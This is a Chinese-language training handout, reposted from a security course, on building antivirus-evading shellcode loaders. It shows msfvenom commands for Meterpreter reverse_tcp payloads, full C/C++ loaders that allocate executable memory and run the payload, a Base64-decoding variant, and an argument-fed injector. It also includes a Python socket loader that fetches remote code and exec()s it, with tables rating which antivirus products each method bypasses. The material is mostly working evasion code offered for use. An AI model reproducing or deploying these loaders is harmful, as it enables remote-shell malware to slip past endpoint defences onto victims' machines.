课件来源于100次直播
#知识点:1、C/C++-Shellcode编译2、C/C++-编码加密-XOR&BASE643、C/C++-分离式加载器-参数&SOCK#以下环境采用MSF生成的C-Shellcode测试
C/C++_Shellcode-单纯编译
| 安全厂商 | 语言/类别 | 结果 |
| X60 | C/C++ 直接编译 | Bypass |
| 管家 | C/C++ 直接编译 | GG |
| 某绒 | C/C++ 直接编译 | GG |
| Windows Defender | C/C++ 直接编译 | GG |
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=xx -f c
#include <windows.h>#include <stdio.h>typedef void(_stdcall* CODE)();#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")unsigned char shellcode[] =""; //MSF生成的shellcodevoid main(){PVOID p = NULL;p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (p == NULL){return;}memcpy(p, shellcode, sizeof(shellcode));CODE code = (CODE)p;code();}
1、C/C++_Shellcode-汇编执行
| 安全厂商 | 语言/类别 | 结果 |
| X60 | C/C++ 汇编调用 | Bypass |
| 管家 | C/C++ 汇编调用 | GG |
| 某绒 | C/C++ 汇编调用 | GG |
| Windows Defender | C/C++ 汇编调用 | GG |
#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] =""; //MSF生成的shellcodevoid main(){__asm{mov eax, offset shellcode_emit 0xFF_emit 0xE0}}
2、C/C++_Shellcode-编码混淆
| 安全厂商 | 语言/类别 | 结果 |
| X60 | C/C++ 编码混淆 | Bypass |
| 管家 | C/C++ 编码混淆 | Bypass |
| 某绒 | C/C++ 编码混淆 | GG |
| Windows Defender | C/C++ 编码混淆 | Bypass |
1、 Python编码Shellcode后,利用C进行解码调用执行2、 Shellcode进行XOR运算后,利用C进行调用执行msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=xx.xx.xx.xx lport=xx-f c
1.c code:#include <Windows.h>#include <stdio.h>#include <string.h>#include "base64.h"#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")unsigned char buf[] =""; //MSF生成Base64 shellcodeint main(int argc, const char* argv[]) {char str1[1000] = { 0 };Base64decode(str1, buf);//printf("%d ", sizeof(str3));char* Memory;Memory = VirtualAlloc(NULL, sizeof(str1), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);memcpy(Memory, str1, sizeof(str1));((void(*)())Memory)();return 0;}
base64.h code#pragma once#ifndef _BASE64_H_#define _BASE64_H_#ifdef __cplusplusextern "C" {#endifint Base64encode_len(int len);int Base64encode(char* coded_dst, const char* plain_src, int len_plain_src);int Base64decode_len(const char* coded_src);int Base64decode(char* plain_dst, const char* coded_src);#ifdef __cplusplus}#endif#endif //_BASE64_H_
base64.c code/* Base64 encoder/decoder. Originally Apache file ap_base64.c*/#include <string.h>#include "base64.h"/* aaaack but it's fast and const should make it shared text page. */static const unsigned char pr2six[256] ={/* ASCII table */64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64};int Base64decode_len(const char* bufcoded){int nbytesdecoded;register const unsigned char* bufin;register int nprbytes;bufin = (const unsigned char*)bufcoded;while (pr2six[*(bufin++)] <= 63);nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;nbytesdecoded = ((nprbytes + 3) / 4) * 3;return nbytesdecoded + 1;}int Base64decode(char* bufplain, const char* bufcoded){int nbytesdecoded;register const unsigned char* bufin;register unsigned char* bufout;register int nprbytes;bufin = (const unsigned char*)bufcoded;while (pr2six[*(bufin++)] <= 63);nprbytes = (bufin - (const unsigned char*)bufcoded) - 1;nbytesdecoded = ((nprbytes + 3) / 4) * 3;bufout = (unsigned char*)bufplain;bufin = (const unsigned char*)bufcoded;while (nprbytes > 4) {*(bufout++) =(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);*(bufout++) =(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);*(bufout++) =(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);bufin += 4;nprbytes -= 4;}/* Note: (nprbytes == 1) would be an error, so just ingore that case */if (nprbytes > 1) {*(bufout++) =(unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);}if (nprbytes > 2) {*(bufout++) =(unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);}if (nprbytes > 3) {*(bufout++) =(unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);}*(bufout++) = '\0';nbytesdecoded -= (4 - nprbytes) & 3;return nbytesdecoded;}static const char basis_64[] ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";int Base64encode_len(int len){return ((len + 2) / 3 * 4) + 1;}int Base64encode(char* encoded, const char* string, int len){int i;char* p;p = encoded;for (i = 0; i < len - 2; i += 3) {*p++ = basis_64[(string[i] >> 2) & 0x3F];*p++ = basis_64[((string[i] & 0x3) << 4) |((int)(string[i + 1] & 0xF0) >> 4)];*p++ = basis_64[((string[i + 1] & 0xF) << 2) |((int)(string[i + 2] & 0xC0) >> 6)];*p++ = basis_64[string[i + 2] & 0x3F];}if (i < len) {*p++ = basis_64[(string[i] >> 2) & 0x3F];if (i == (len - 1)) {*p++ = basis_64[((string[i] & 0x3) << 4)];// *p++ = '=';}else {*p++ = basis_64[((string[i] & 0x3) << 4) |((int)(string[i + 1] & 0xF0) >> 4)];*p++ = basis_64[((string[i + 1] & 0xF) << 2)];}//*p++ = '=';}*p++ = '\0';return p - encoded;}
3、C/C++_Shellcode-分离加载
| 安全厂商 | 语言/类别 | 结果 |
| X60 | C/C++ 编码混淆 | Bypass |
| 管家 | C/C++ 编码混淆 | Bypass |
| 某绒 | C/C++ 编码混淆 | Bypass |
| Windows Defender | C/C++ 编码混淆 | GG |
利用思路:编译接受执行加载器,进行Shellcode参数传递调用执行项目:https://github.com/DimopoulosElias/SimpleShellcodeInjector生成:msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6688 -f c -o msf.txt分割:cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"编译:"i686-w64-mingw32-c++.exe" SimpleShellcodeInjector.c -o ssi.exe使用:ssi.exe shellcode
4、Python++_Shellcode-分离Sock
| 安全厂商 | 语言/类别 | 结果 |
| X60 | Python Socket传输 | Bypass |
| 管家 | Python Socket传输 | Bypass |
| 某绒 | Python Socket传输 | Bypass |
| Windows Defender | Python Socket传输 | Bypass |
利用思路:建立客户端和服务端,Shellcode以数据发送接收执行本来准备测试C/C++ Socket传输shellcode上线由于C代码socket开发较为复杂,改用Python替代
import socket,base64server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.connect(('192.168.46.138',7777))#s shellcode base64编码值s=''while 1:server.sendall(bytes(s, 'utf-8'))#coding:utf-8import socket,requestsimport ctypes,base64server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.bind(('127.0.0.1',7777))server.listen(1)print('waiting for connection...')conn,addr=server.accept()print("已经连接")while 1:s=conn.recv(1024).decode('utf-8')shellcode=base64.b64decode(s)#ss 代码执行函数base64编码值 URL获取ss = requests.get('http://www.xx.com/xx.txt').textfunc = base64.b64decode(ss)exec(func)
吃瓜请扫码:
文章转载自小迪安全,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
